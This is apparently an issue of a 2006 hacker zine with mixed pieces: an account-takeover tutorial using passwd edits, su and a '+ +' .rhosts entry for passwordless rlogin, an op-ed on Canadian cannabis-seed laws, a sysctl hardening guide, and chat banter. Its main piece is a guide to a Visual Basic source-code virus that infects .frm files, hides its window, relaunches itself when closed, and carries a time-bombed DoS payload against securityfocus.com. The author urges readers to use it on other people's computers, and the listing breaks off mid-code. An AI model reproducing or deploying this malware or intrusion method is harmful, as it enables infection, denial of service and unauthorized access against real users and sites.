drwxr-xr-x 5 boss users 512 Sep 2 05:35 boss drw-r-xr-x 5 boss users 512 Sep 4 05:35 boss drwxr-xr-x 2 jerry users 512 Sep 10 05:35 jerry drwxr-xr-x 2 770 mail 1024 Sep 10 05:35 mail drwxr-xr-x 2 330 users 512 Sep 2 05:35 jeff Okay, great. We see a listing of users, lets pick "mail" since it is in a group all by itself. We grab "mail" and put mail in our passwd file. Pick an editor of your choice, and change the actual entry to suit your wishes: # emacs /etc/passwd mail:x:770:2::/home:/bin/csh Now, we add that line to our etc/passwd file, and we can get into "mail"s account. Normally, you would expect to do this to one, or ever more than one user. You could even create a script to automate much of this. Once you have added "mail" to the passwd file, you can "su - mail" to get on the mail account: # su - mail Aha, thats it. You are in the mail account. You can ls to see the folder and file listings: # ls -l total 7 drwxr-xr-x 5 boss users 512 Sep 2 05:35 boss drwxr-xr-x 5 boss users 512 Sep 2 05:35 boss drw-r-xr-x 5 boss users 512 Sep 4 05:35 boss drwxr-xr-x 2 jerry users 512 Sep 10 05:35 jerry drwxr-xr-x 2 mail mail 1024 Sep 10 05:35 mail drwxr-xr-x 2 330 users 512 Sep 2 05:35 jeff Notice that the user number for "mail" is gone. It is gone because we are now the rulers of "mail". We su'd to it, so its ours. Now, just we can just change mail's .rhosts file to include wildcards (+ +) and we can rlogin without a password into mail's account! # cd mail Change to mail's directory # emacs .rhosts If .rhosts doesnt exists, then you can just make it. If it does exist, you can just add (or truncate and add) : + + This small wonder will allow you to rlogin without a password! Then, you can get into the box and hack deeper. - war mess with the best, die like the... SUICIDE HACKRZL OLZ ::::- K-1INE:XLIX::VI:VI:MMVI:AD::DCLXVI -:- K-1INE:49::06/06/2006:AD::666 -:::: () Seeds, Prohibition and YOU () Seeds. They are just as illegal as the plant itself, and yet there have only been 5 arrests in all of Canadian history, and 2 of them in the last two months, and three of them in the last year. Why so many busts all of a sudden? A seed company out of Montreal Quebec was shut down recently, and yet they were part of the better business beuro for the last 9 years. There is currently a nation wide crackdown on seeds. This is a move made by the Canadian government mostly due to pressure from the United States. Seed stores in Canada have been operating openly for years with no hassle from the police or any other agencies. The mainstream media doesn't seam to want to acknowledge that these busts are a very new thing. The TV reports seam to convey that seed busts happen just as often as cocaine and heroin busts. The DEA has absolutely no business in Canada, and yet they lead the raid on the BC Marijuana Party bookstore. The absolute biggest reason for this hyper-paranoia of seeds has to be undo- ubtedly the lack of education on the marijuana plant. The seeds themselves have no THC in them and you cannot get high on the seeds alone. The seeds cannot be considered a drug, and yet people can still get arrested for them like they were selling a deadly substance that will kill you if you are in the same room as it. What does this mean for the people who want to buy seeds? It mainly means that people will be buying out of country, mainly from Amsterdam, and generally, seeds are not very cheap to begin with, but ordering from out of country will make seeds even more expensive. What does this mean for Canada and Canadian seed buyers and Canadian seed sellers? First of all, more money will be going out of the country, while less money will be going into the hands of legit seed sellers in Canada. Oh, by the way, did I mention that the seed businesses that are being bus- ted are paying taxes for the seeds they sell? That means less money going to the government. It is a quadruple blow to Canadas economy to start enforcing this immoral law. Lets summarize: 1) Seed sellers wont be paying taxes so less money goes to the government. 2) Seed buyers will buy out of country, sending money out of Canada. 3) Tax payers pay police officers to make raids on seed sellers. 4) Tax payers pay to keep harmless, taxpaying seed sellers in jail. Seed sellers lose. Seed buyers lose. Every single Canadian who pays GST loses (That's you!) Money isn't the only issue here. Enforcing immoral seed laws will push the seed industry underground. Counterfeit seeds will be distributed more freely and to get seeds a person would have to succumb to entering shady houses where hard drugs and marijuana mix. Crime will rise. Growers will be put at risk by having to go to shady drug houses. Imagine, some one with terminal cancer wants a few plants to take away the pain of therapy and help their appetite, but to get seeds they need to go into a house were people are openly doing cocaine and where the quality of the seeds are not guaranteed as they are now. This is an extreme example, but this reality is not far away. It is up to every Canadian to voice out against this crime. It is not healthy for communities for this law to be enforced. It is not healthy for municipalities for this law to be enforced. It is not healthy for Provinces for this law to be enforced. It is not healthy for the Country. -Aftermath aftermath.thegreat@gmail.com i found a couple ferrero rochers! i am consoled it's better to be consoled than gui'd ::::- K-1INE:XLIX::VI:VI:MMVI:AD::DCLXVI -:- K-1INE:49::06/06/2006:AD::666 -:::: Linux sysctl.conf Sample Settings and Explanations. /etc/sysctl.conf can be a powerful way of changing kernel settings at run-time. If you have sysctl.conf support compiled into your kernel, you can edit param- eters in the sysctl.conf to change the way your kernel behaves. This article will attempt to outline a number of sysctl configuration options. I've tried to include detailed descriptions, so you can make your own judgements on what I've recommended. Just for reference, I use Annvix ([http://www.annvix.org www.annvix.org]) Linux and a custom 2.4.32 kernel with the OpenWall ([http:// www.openwall.org www.openwall.org]) patches installed. net.ipv4.ip_forward = 0 As listed, this will disable IP forwarding from this machine. This disables the ability of this machine to act as a router and forward traffic to other machines. Possible states for this option are 1 and 0. net.ipv4.conf.default.rp_filter = 1 net.ipv4.conf.all.rp_filter = 1 This option attempts to verify packet source addresses using reverse patch. This option will require that packets with a particular outgoing source addresses also receive their replies on the same interface as they were sent out. Possible states for this option are 1 and 0. Note: this option has a detrimental effect on linux machines set up as a router that use advanced or policy routing, as it has a tendancy to drop packets. net.ipv4.conf.all.log_martians = 1 net.ipv4.conf.default.log_martians = 1 This option tells the kernel to log the source address of all packets with no route back to the source address. Martian packets are seemingly "dropped in from Mars," because we have no idea where they came from, or how to get them back. Kernel default is off (0). Possible states are 1 and 0. net.ipv4.icmp_echo_ignore_broadcasts = 1 This option instructs the kernel to ignore ICMP messages to broadcast or multicast addresses. Helps to prevent smurf attacks among other things, and is generally unneccessary unless you need to know how many hosts on your network are alive. Kernel default is off (0). Possible states are 1 and 0. net.ipv4.icmp_ignore_bogus_error_responses = 1 This option ignores incorrectly constructed error messages. Basically, it saves space in your logs, since some routers don't send out proper error messages, and oh, hey look, we don't care. Kernel deafult is off (0). Possible states are 1 and 0. fs.file-max = 8192 This option specifies the max number of file handles that can be opened at one time. Default setting is 4096. fs.inode-max = 32768 This option specifies the max number of inodes that can be opened at one time. Default setting is 4096. net.ipv4.ip_local_port_range = 32768 61000 This option defines the range of ports that we allow clients to connect on. The default value of this variable depends on how much RAM your machine has. If you have more than 1024 MB of RAM, this variable will default to a lower bound of 32768 and a higher bound of 61000. Also, see the option I added on "tcp_tw_recycle" below. net.ipv4.tcp_tw_recycle = 0 This option is somewhat related to the previous option. This option has two possible states, 1 and 0. This option enables fast recycling of sockets in the TCP_WAIT state. This option will increase performance significantly, but can also have an adverse effect on stability It is generally (sometimes) fine to enable this on a local network, but is not advisable when possible network delays ( like those found on the internet) could exist. Possible states are 1 and 0. net.ipv4.tcp_syncookies = 1 When the server SYN queue is overflowed, this option enables the kernel to send out SYN cookies to verify that the SYN packets it is recieving are legitimate. Note that this option may help performance, but is also a vio- lation of the TCP protocol. Should not be used as a tuning mechanism for heavily loaded servers, instead see tcp_max_syn_backlog, tcp_synack_retries, and tcp_abort_on_overflow. I've included information for them below. Also note that the use of this option disables TCP window scaling. Note that the kernel must be compiled with CONFIG_SYN_COOKIES. Default value is 0. Possible states are 1 and 0. net.ipv4.tcp_max_syn_backlog = 2048 This option defines the maximum socket queue size for TCP SYN requests. This can be used as an alternative to SYN cookies. Kernel defaults are 128 if you have less than less than 128 MB of RAM, and 1024 if you have more than 128 MB of RAM. net.ipv4.tcp_synack_retries = 5 This option defines the maximum number of attempts that the kernel will make to establish a connected state on a TIME_WAIT connection. This option is useful for tuning against DoS attacks such as SYN flooding as an alternative to SYN cookies. Kernel default is 5, and each connection takes about 35 sec- onds, so the default timeout for half-open passive TCP connections is 180 seconds. Takes an integer value, but should be left at 5 or lower, unless there is a really good reason. Default is 5. net.ipv4.tcp_syn_retries = 5 This option defines the maximum number of attempts that the kernel will make to establish a connected state on an _active_ TCP connection. Note that this is different than tcp_synack_retries in that this relates to connections that the kernel is making actively. Kernel default is 5, and each connection takes about 35 seconds, so the default timeout for active TCP connections is 180 seconds. Takes an integer value, but should be left at 5 or lower, unless there is a really good reason. Default is 5. net.ipv4.tcp_abort_on_overflow = 0 This option instructs the kernel to send RST responses to incoming connections when the daemon is flooded with connect requests that the daemon cannot handle. If this is set to 0, the system will attempt to handle all requests. As recom- mended in the sysctl documentation, it is good to leave this as 0, unless abs- olutely neccessary, as it may affect your clients. It's a last-ditch option. net.ipv4.tcp_fin_timeout = 10 This option tells the kernel how long to keep connections in the FIN-WAIT-2 state. If the remote end does not properly close its connection, then this option instructs the kernel to drop the connection in 10 seconds. Default is 60. net.ipv4.tcp_keepalive_time = 1800 This option tells the kernel how long to wait before sending keepalive packets to TCP connections in a keep alive state. This setting is related to tcp_keep- alive_probes, and tcp_keepalive_intvl, which are described below. Setting this to 1800 will make the kernel wait 30 minutes before sending any keepalive pro- bes to determine if the connection is still valid. For a connection in keepalive state to be dropped, the kernel waits until tcp_keepalive_time (in our case, 60 seconds). Then, it sends up to tcp_keepalive_probes (default 9) to determine if the host is alive. The probes are sent at the rate defined in tcp_keepalive_intvl (default 75, or 75 every second). Default is 7200. net.ipv4.tcp_keepalive_probes = 9 This option defines how many probes will be sent to a host after the keepalive timeout is reached. Default is 9. net.ipv4.tcp_keepalive_intvl = 75 This option defines the interval (in seconds) between sending TCP keepalive probes. Default is 75. echo "0" > /proc/sys/net/ipv4/tcp_window_scaling Just a quick rundown of TCP windows. There is a lot here, so I didn't feel like commenting it. Default is on. A "TCP window" is the maximum amount of outstanding data that a user can send on a particular connection, before it requires a response from the reciever acknow- ledging that the reviever has indeed received at least some of the data. The kernel will only send data up to the TCP window size limit before waiting for a response from the far end. The default TCP window is 32KB. This value is defined in /usr/src /linux/include/net/tcp.h, in the setting #define MAX_TCP_WINDOW 32767U. TCP buffers help to maximize efficiency of a connection. Having low TCP window sizes on a latent connection (like the internet) will decrease efficiency. TCP window scaling (tcp_ window_scaling) enables TCP to use windows greater than 64KB. This works in conjun- ction with TCP's autotuning features. TCP has an autotuning feature which will att- empt to determine the best window sizes for connections, automatically. Disabling the tcp_window_scaling feature disables TCP windows and autotuning. For more info- rmation see [http://www.psc.edu/networking/projects/tcptune/ http://www.psc.edu/ networking/projects/tcptune/], and the ip-sysctl documentation. net.ipv4.tcp_timestamps = 0 This option instructs the kernel to disable TCP timestamps. Timestamps are used to calculate Round-Trip Time. With this option enabled (1), data packets are sent with timestamps, and returning ACK packets also carry timestamps. RTT can then be calc- ulated by comparing the values. Timestamps are used by the PAWS (Protection Against Wrapped Sequences) algorithm to ensure that TCP sequence numbers are not wrapped before packets are delivered. Problems arise when packets are latent, and the TCP sequence numbers wrap before the latent packets are delivered. A DoS condition can exist in certain situations with this option enabled, as PAWS sometimes can be tr- icked into dropping valid packets. Also, leaving this enabled means it's just "one more thing" for the kernel to do. Default is 1. Possible values are 1 and 0. net.ipv4.conf.all.accept_source_route This option will disable source routing for this machine. If this machine isn't a router, you probably don't need source routing. Default is 1. Possible values are 1 and 0. net.ipv4.conf.all.send_redirects = 0 This option instructs the kernel to NOT send ICMP redirect messages. Other related ICMP options are listed below. Possible values are 1 and 0. net.ipv4.ipfrag_time = 20 This option tells the handler how long to keep an IP fragment in memory, 20 seconds in this case. Only fragments that can not yet be assembled are kept here, since fragments that can be assembled have already been moved. net.ipv4.conf.all.accept_redirects = 0 Refuse to accept IP redirects We don't want someone telling us that there is a 'faster' or 'better' path, and potentially hijacking our connection. default is on (1). net.ipv4.tcp_ecn = 0 don't use Explicit Congestion Notification in our packets. Some routers don't like it. net.ipv4.tcp_rfc1337 = 1 This option requires compliance with RFC1337. Enabling this option will ignore RST packets that are sent to a connection in a TIME_WAIT state. Instead, the connection will wait for the connection to timeout like normal. I dunno what you guys comments on this is, I usually leave it on. net.ipv4.conf.all.proxy_arp = 0 We don't really want to proxy ARP for anyone, do we? This option is turned off by default, but just to be safe... net.ipv4.route.flush = 1 Disable autocaching of window sizes in the routing table. - war Especialy when you have bomb ass dreams and wake up. dreams allow us to live while we sleep, I like that dreams are awesome Exactly, Doob. Dreams are awesome like playing pretend is awesome. DoobieEx no one wants to know about your dreams of shoving hand grenades into your anus ::::- K-1INE:XLIX::VI:VI:MMVI:AD::DCLXVI -:- K-1INE:49::06/06/2006:AD::666 -:::: ____________________________________________________________ | | |-Guide to making source code viruses using MS Technologies-| |___________________________________________________________| By Two-Twenty _______________________ / \ | Hi. Call Me Harper, | | leader of the American | | revolution which will | | occur in Canada. | \___________ ________/ \ | ~---_ \ | / \ \| x \ | /, \_ _? {_ / {___.| 0 - ___---=== T0K ===---___ 0 - Table 0f Kontentz 1 - Intros 2 - Psudocode and notes 3 - Adding a back door 4 - Adding a payload 5 - Raw viral code 6 - Viral Code attached to working program (final product) 7 - Executing and spreading virus 8 - Outros 1 - ___---=== Intros ===---___ Hello. I am going to keep the commentary on this article short and sweet. This file is going to try to (re)introduce you to the lost art of source code viruses. If you hate any of the following you might enjoy this file: -Microsoft -People who like microsoft -Visual Basic 6.0 -People who like visual basic 6.0 -The open source scene -Full Disclosure of exploits and/or whitehats -Websites where you can upload your open source visual basic programs for others to use, study and enjoy and/or the people who use those sites. -People who like to use http://securityfocus.com to find exploits so they can prawn boxes because they cant make their own exploits. If you love any of the following you may enjoy this file: - Chaos/m4yh4m - Malware/Virus/Interesting Source Code - Ruining some one elses day - (D)DoSing http://securityfocus.com Chapter two is just an introduction to the code and how it will work. Chapter three is the details of how we will add a back door and what functions the back door will provide us. The back door part of the virus is optional, and is not needed, but I included it anyways. Chapter four is where I add a payload to the virus. Chapter five is the raw virus code. It is the code as it would be if it were not attached to any other program. This part of the code can be used to infect other .frm files. I have included this because it makes the virus easyer to study and understand. Chapter six is the virus as it would be if attached to another program. Use the code in chapter six to attack computers as explained in chapter seven. Do you know nothing about Visual basic, programming, viruses or even computers? Thats ok! I make it simple enough for any script toddler to use this virus source to attack other programmers computers and take control of them! Just skip to chapter six, Executing and spreading virus. Chapter seven ties up loose ends. Please note that none of the code in this article is wrapped at 80 colums. This file is aprox. 35 pages long while in notepad at a 1024X768 Resolution. A final note before reading on: I wrote all the code in vb6.0 and tested it many times. To my knowlege this program does work with logic and syntax errors minimal. Spelling and grammer errors are a differnt story tho. I wrote this file for the technical aspect, not to get a good grade in English 101. 2 - ___---=== Pseudocode and Understanding this virus ===---___ Source code viruses were much more common in the early 90s. They are rarely seen any more except in old texts. Common source code viruses could be found written in Basic, C and even batch. Most of them were extreemly simple viruses and did little more than write over other source code the virus found, destorying the program in the process. This piece of code I have written does not destroy the source code that it infects and leaves the program functional while still infecting other files in the background while the code runs as inteded. If you read the last k-1ine you might have read the article titled "Another Malware File" By Aftermath. This one is an extention of the file that Aftermath wrote. In a nutshell, this virus finds .frm files, which are visual basic source files stored in plain text, and adds its own code it them. One thing Aftermaths virus did not do was spread without potentialy destroying essential code in the original source code of the .frm file. This new improved virus does this. It also does a lot of things the original does not do. The source code you are about to see is another source code virus, except instead of adding a bunch of text to the end of the frm file, it adds two chunks of code at the beginning of the first two sub functions it finds. This code is a lot less prone to errors and a little less obvious to detect. Here is an example of some high level VB psudocode that is NOT yet infected (pretend you are reading the source code in notepad): ________________________________________________ |#form1.frm - Notepad _=X| | --------------------------------------------- | | | |Subfunction Load Form() | | | | print in message box "hello, welcome!" | | | |End Subfuction | | | | | | | | | | | |Subfunction Unload Form() | | | | print in message box "goodbye!" | | | |End Subfunction | | | | | | | ------------------------------------------------ Ok, so a regualr application. Here is what it will look like when it's hit by this virus: ________________________________________________ |#form1.frm - Notepad _=X| | --------------------------------------------- | | | |Subfunction Load Form() | | | | find original .frm file for the virus source | <- virus source here | | (first part) | find .frm files and store them on computer | <- virus source here | | (first part) | print in message box "hello, welcome!" | <- original source | | |End Subfuction | | | | | | | | | | | |Subfunction Unload Form() | | | | find functions in found frm files | <- virus source here | | (second part/payload) | infect functions with virus source | <- virus source here | | (second part/payload) | print in message box "goodbye!" | <- original source | | |End Subfunction | | | | | | | ------------------------------------------------ Of course it's not that simple, but thats what it does. If there are more than two subfunctions it ignores the rest. It just finds the first two functions to infect. If there is only one function or no function or even if the .frm file is empty for some reason, it does not infect. It will only infect if it finds the beginning and end of two functions. I have tried to make the loops as tight and quickly excuted as possible. Because this is a source code virus, the less code that is copied around the quicker the execution is executed. If you are intent on studying this code then there might be a few built in visual basic 6.0 functions you are unfamilar with. I use this one function that is not often used: "FreeFile" will place a number as the next free open file to use. When doing VB you can only have so many files open at once. I forget how many, but there is a limit. You cant use two file numbers at the same time. For example, you cant do this: open "c:\autoexec.bat" for input as #1 open "c:\config.sys" for binary read as #1 That's a big nono. You will get errors. This code uses inputs and outputs, but because its infecting already made code, we dont want to use #1 if file #1 is already in use. Instead we do this: dim x as integer x = FreeFile Open "C:\autoexec.bat" for input as #x That works fine. If the code already opend up #1 and #2 and #3 and #4, X will be 5. There is not too much more to say except I use lots of "Shell" functions these allow commands to be fed into cmd.exe while allowing the vb program to continue to run without waiting for the command to finish executing. If you need this code to run really fast, take out all of the comments (except for the markers!) and nice paragraph spacing. This will mean it will be harder to debug if something goes wrong but it also means less code to copy around and quicker infection. 3 - ___---=== Adding a back door ===---___ Ok. I decided NOT to add a back door into this version of the virus. If you want to have a backdoor in your own virus then you can write one on your own. It's not hard to write a back door into this virus. I would add it at the very end of the source as commented out text, then bring that text to a text file and compile it using vb6's command line compiler. Voula! Instant EXE back door. Use your n3njh4r skills to make it run at start up. The tools I create are my own and no one elses. You should have this same philosophy. If you want to add a back door, make your own, and replace the included payload that I added. Doing this will be very simple because all you will have to do is replace my "payload" code with your backdoor code 4 - ____---=== Adding a payload ===---___ Ok, so instead of adding a back door into this version of the virus, I decided instead to add a payload. What does the payload do you might ask? It DoSs http://securityfocus.com by sending an http request from a socket Why security focus? Because they publish all the underground soruce codes. When writing this viurs I thought about putting a very extensive bot that would connect to dalnet. This bot would respond to many commands such as DoS functions, proxie functions, keylogger functions, port scanner funct- ions and a few other not so important functions. All of these would be controlled through IRC creating a botnet. After thinking about it for a while, I decided that this is unwise. Anydumbshit could place attacks on the visual basic open source community with my code that I so tediously written. This would put the bot code on high alert lists and shit. People would recognize it right away if I tried to use it for any- thing important, and there might even be "cleaning tools" written by the very security focus people that I dispise. This would be doulbe fold self distruction. So instead I just included a small piece of code that will DoS that dumb site. This is killing two birds with one stone. If anyone thinks its cool to spread a virus, then security focus will be hit with lots of traffic, and the random script kiddy will be cought and put in jail where he will rec- eive lots of action in the reer, while still allowing people who really want to learn about the dark side of coding to do so. The DoS code I included simply compiles itself to an exe, burries itself in the \system32 file folder and a line of code is written to autoexec.bat so it gets executed every time the computer starts. It will DoS that bei- otch with all the sockets the computer can handle, essentially fuXoring up the computer that it is hosted on. This makes the computer obviously broken - so we do a time bomb. Why a time bomb? Well when we release it, we don't want the computers we are infecting to be fucked up right away - we want them to spread the virus around more, so say we release the virus on February 1st. This would give the virus a month to spread before it starts its payload, which will occur immediately after valentines day. I hate valentines day. Hearts suck. In kindergarden we used to pass around hearts to all of our friends. I had the clever idea of passing around farts instead. My teacher called me a shithead. I never liked valentines day after that. So this gives it enough time to spread, but not too much time, because then a lot of people might find the executable, or even worse, a cleaner tool might be created to clean the virus traces. Remember, this is a source code virus that is sitting there in plain text. Its not hard to detect. I used 2000 sockets per host to DoS the address. This may not look like a lot, but if the virus infects 10 computers, thats a potential 20000 conn- ections. I additionaly added 200 sockets to DoS port 22 which will fuck the admins around if they try to remotely fix the DoS attacks that are comming at them. One last note before getting onto the payload source. I added a few tricks that I learned over time that will help the prevention of shutting down the program. One of those tricks is in the sub function "Form_Terminate". When some one tries to shut down the program, the last thing the program will do before completely shutting down is call itself. This wont work 100% of the time, but it often does. Here is the source code for the DoS function. '----%<---- cut here----%<---- cut here----%<---- cut here----%<---- cut here----%<- VERSION 5.00 Object = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0"; "MSWINSCK.OCX" Begin VB.Form Form1 Caption = "Form1" ClientHeight = 465 ClientLeft = 1665 ClientTop = 1935 ClientWidth = 1560 Icon = "Form1.frx":0000 LinkTopic = "Form1" ScaleHeight = 465 ScaleWidth = 1560 Begin MSWinsockLib.Winsock Winsock1 Index = 0 Left = 0 Top = 0 _ExtentX = 741 _ExtentY = 741 _Version = 393216 End End Attribute VB_Name = "Form1" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Private Sub Form_Load() 'built in vb stealth functions Form1.Visible = False doevents App.TaskVisible = False 'time bomb.. must be March - December when it DoSs Dim strmonth As String strmonth = Mid(Date, 4, 2) If strmonth < 3 Then End Dim i As Integer Dim load_sockets As Boolean 'we only want to load the sockets once. If load_sockets = False Then For i = 1 To 2200 Load Winsock1(i) DoEvents load_sockets = True Next i End If '2000 sockets will DoS port 80 For i = 1 To 2000 Winsock1(i).RemoteHost = "http://securityfocus.com" Winsock1(i).RemotePort = "80" Winsock1(i).Close DoEvents Winsock1(i).Connect Next i '200 sockets will DoS port 22 For i = 2001 To 2200 Winsock1(i).RemoteHost = "http://securityfocus.com" Winsock1(i).RemotePort = "22" Winsock1(i).Close DoEvents Winsock1(i).Connect Next i End Sub Private Sub Form_Terminate() 'calling itself if some one tries to shut it down Shell ("cmd.exe /c " & App.Path & "\" & App.EXEName & ".exe") End Sub Private Sub Winsock1_Error(Index As Integer, ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean) 're-opening itself if it closes/times out Winsock1(Index).Close Winsock1(Index).Connect DoEvents End Sub '----%<---- cut here----%<---- cut here----%<---- cut here----%<---- cut here----%<- This is just a simple port flooder. Alone it wont do anything, but after a lot of computers are infected then this has the potential to take the website off the intranet, atleast for a while. Later I will explain how this code will be taken from source code and compiled into an exe. 5 - ___---=== Raw viral code ===---___ Here is the virus code that can be used to infect a bunch of other .frm files It is in three sub functions, and includes option explicit. The main reason I have included option explicit is because there is a possibility that the file it will infect also has option explicit enabled. This just helps testing the virus to make sure that we dont accidentaly use a variable that hasnt been delclared. To infect other .frm files with this launch code, execute the first sub fucntion (sub1()), then stop the program (or create a delay that lasts around 4-5 seconds) then execute sub2() sub function. Obviously, visual basic studio 6.0 will be needed. '--- %< ---cut-here------ %< ---cut-here------ %< ---cut-here------ %< ---cut-here---' Option Explicit Private Sub sub1() 'faqchew App.TaskVisible = False Dim line1, checkstatus1, lineput As String Dim i, importantvariable As Integer Dim j As Double Dim freefile1, freefile2, freefile3 As Integer Shell ("cmd.exe /c cd " & App.Path & " && dir /b > " & Mid(App.Path, 1, 3) & "C0NFIG.sys"), vbHide If Dir(Mid(App.Path, 1, 3) & "Documents and Settings") <> "" Then Shell ("cmd.exe /c cd " & Mid(App.Path, 1, 3) & "Documents and Settings && dir /b /s >> " & Mid(App.Path, 1, 3) & "MSD0S.sys"), vbHide Else Shell ("cmd.exe /c cd " & Mid(App.Path, 1, 3) & "Program Files && dir /b /s >> " & Mid(App.Path, 1, 3) & "MSD0S.SYS"), vbHide End If DoEvents redo1: importantvariable = importantvariable + 1 j = Timer j = j + 2 Do Until Timer >= j Loop 'use this instead of gay timer!!!! 'Do ' DoEvents 'Loop Until Mid(App.Path, 1, 3) & "drives.sys" <> "" If Dir(Mid(App.Path, 1, 3) & "C0NFIG.sys") = "" Then If importantvariable >= 3 Then GoTo skip1 GoTo redo1 End If freefile1 = FreeFile Open Mid(App.Path, 1, 3) & "C0NFIG.sys" For Input As #freefile1 DoEvents Do Until EOF(freefile1) DoEvents Line Input #freefile1, line1 DoEvents line1 = UCase(line1) If Right$(line1, 4) = ".FRM" Then freefile2 = FreeFile Open line1 For Input As #freefile2 Do Until EOF(freefile2) Line Input #freefile2, checkstatus1 DoEvents Dim EOInfect As Boolean DoEvents If checkstatus1 = "'faqchew" Then freefile3 = FreeFile Open Mid(App.Path, 1, 3) & "B00T.INI" For Append As #freefile3 Do Until EOInfect = True Print #freefile3, checkstatus1 If checkstatus1 = "'faqchew2" Then EOInfect = True Line Input #freefile2, checkstatus1 Loop EOInfect = False Close #freefile3 End If DoEvents If checkstatus1 = "'fakmeh" Then freefile3 = FreeFile Open Mid(App.Path, 1, 3) & "AUT0EXEC.BAT" For Append As #freefile3 Do Until EOInfect = True Print #freefile3, checkstatus1 If checkstatus1 = "'teh endg" Then EOInfect = True Line Input #freefile2, checkstatus1 Loop EOInfect = False Close #freefile3 End If DoEvents 'payload part one If InStr(1, checkstatus1, "non disclosure revolution", vbTextCompare) Then 'MsgBox checkstatus1 freefile3 = FreeFile Open Mid(App.Path, 1, 3) & "I0.SYS" For Append As #freefile3 Do Until EOInfect = True Print #freefile3, checkstatus1 If checkstatus1 = "' fuck full disclosure. '" Then EOInfect = True Line Input #freefile2, checkstatus1 Loop EOInfect = False Print #freefile3, vbCrLf Close #freefile3 End If DoEvents If InStr(1, checkstatus1, "'theres nothing left for me to hide", vbTextCompare) Then freefile3 = FreeFile Open Mid(App.Path, 1, 3) & "systemProj1.vbp" For Append As #freefile3 Do Until EOInfect = True Print #freefile3, checkstatus1 If checkstatus1 = "'-NIN 2005" Then EOInfect = True Line Input #freefile2, checkstatus1 Loop EOInfect = False Print #freefile3, vbCrLf Close #freefile3 End If DoEvents DoEvents Loop Close #freefile2 End If Loop Close #freefile1 Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "C0NFIG.sys"), vbHide skip1: 'faqchew2 End Sub Private Sub sub2() 'fakmeh Dim IntArray(0 To 4), i As Integer Dim line_string, lineput As String Dim j As Double Dim freefile9, freefile2, freefile4, freefile5, freefile6 As Integer Dim exit_thing As Boolean If Dir(Mid(App.Path, 1, 3) & "MSD0S.sys") = "" Then GoTo skip2 freefile9 = FreeFile Open Mid(App.Path, 1, 3) & "MSD0S.sys" For Input As #freefile9 Do Until EOF(freefile9) skip_infect: Input #freefile9, lineput lineput = UCase(lineput) If Right$(lineput, 4) = ".FRM" Then ''debug'' 'MsgBox "lineput = " & lineput freefile2 = FreeFile exit_thing = False Open lineput For Input As #freefile2 Do Until EOF(freefile2) Or exit_thing = True Line Input #freefile2, line_string If InStr(1, line_string, "faqchew", vbTextCompare) <> 0 Then exit_thing = True End If Loop Close freefile2 If exit_thing = True Then GoTo skip_infect End If freefile2 = FreeFile Open lineput For Input As #freefile2 For i = 0 To 4 IntArray(i) = 0 Next i Do Until EOF(freefile2) Or IntArray(3) <> 0 Or IntArray(4) <> 0 Line Input #freefile2, line_string IntArray(0) = IntArray(0) + 1 If InStr(1, line_string, "Function", vbTextCompare) <> 0 Or InStr(1, line_string, "Sub", vbTextCompare) <> 0 Then If InStr(1, line_string, "Declare", vbTextCompare) = 0 And InStr(1, line_string, "Const", vbTextCompare) = 0 And InStr(1, line_string, ")", vbTextCompare) <> 0 And InStr(1, line_string, "(", vbTextCompare) <> 0 And InStr(1, line_string, "End ", vbTextCompare) = 0 And InStr(1, line_string, Chr(34), vbTextCompare) = 0 And InStr(1, line_string, "Exit Function", vbTextCompare) = 0 And InStr(1, line_string, "=", vbTextCompare) = 0 And InStr(1, line_string, "'", vbTextCompare) = 0 Then If IntArray(1) = 0 Then IntArray(1) = IntArray(0) Else IntArray(3) = IntArray(0) End If End If End If If InStr(1, line_string, "End Sub") <> 0 Or InStr(1, line_string, "End Function") <> 0 Then If IntArray(2) = 0 Then IntArray(2) = IntArray(0) Else IntArray(4) = IntArray(0) End If End If DoEvents Loop Close #freefile2 DoEvents freefile4 = FreeFile Open Mid(App.Path, 1, 3) & "newfile.txt" For Output As #freefile4 freefile5 = FreeFile Open lineput For Input As #freefile5 For i = 0 To IntArray(1) - 1 Line Input #freefile5, line_string Print #freefile4, line_string DoEvents Next i freefile6 = FreeFile Open Mid(App.Path, 1, 3) & "B00T.INI" For Input As #freefile6 Do Until EOF(freefile6) Line Input #freefile6, line_string Print #freefile4, line_string DoEvents Loop Close #freefile6 DoEvents For i = i To IntArray(3) - 1 Line Input #freefile5, line_string Print #freefile4, line_string DoEvents Next i DoEvents freefile6 = FreeFile Open Mid(App.Path, 1, 3) & "AUT0EXEC.BAT" For Input As #freefile6 Do Until EOF(freefile6) Line Input #freefile6, line_string Print #freefile4, line_string DoEvents Loop Close #freefile6 DoEvents Do Until EOF(freefile5) Line Input #freefile5, line_string Print #freefile4, line_string DoEvents Loop '''''''''''''''' Dim freefilefuck As Integer freefilefuck = FreeFile Open Mid(App.Path, 1, 3) & "I0.SYS" For Input As #freefilefuck Do Until EOF(freefilefuck) Line Input #freefilefuck, line_string Print #freefile4, line_string DoEvents Loop Close #freefilefuck DoEvents freefilefuck = FreeFile Open Mid(App.Path, 1, 3) & "systemProj1.vbp" For Input As #freefilefuck Do Until EOF(freefilefuck) Line Input #freefilefuck, line_string Print #freefile4, line_string DoEvents Loop Close #freefilefuck DoEvents '''''''' Close #freefile5 Close #freefile4 On Error Resume Next FileCopy Mid(App.Path, 1, 3) & "newfile.txt", lineput DoEvents Kill Mid(App.Path, 1, 3) & "newfile.txt" End If DoEvents Loop Close #freefile9 DoEvents 'FINALLY.. what we do here is create the EXE of the payload, then we 'get the FUCK out of town like real dawgz. '.VBP file Dim freefilefuck1 As Integer freefile9 = FreeFile Open Mid(App.Path, 1, 3) & "systemProj1.vbp" For Input As #freefile9 DoEvents freefilefuck1 = FreeFile Open Mid(App.Path, 1, 3) & "Project1.vbp" For Output As #freefilefuck1 Dim g_string As Integer For g_string = 1 To 7 Line Input #freefile9, line_string Next g_string Do Until line_string = "'see the animial in his cage that you built" Line Input #freefile9, line_string If InStr(1, line_string, "in his cage", vbTextCompare) = 0 Then Print #freefilefuck1, Mid(line_string, 2) End If DoEvents Loop Close #freefilefuck1 DoEvents Close #freefile9 DoEvents '.FRM file Open Mid(App.Path, 1, 3) & "I0.SYS" For Input As #freefile9 DoEvents freefilefuck1 = FreeFile Open 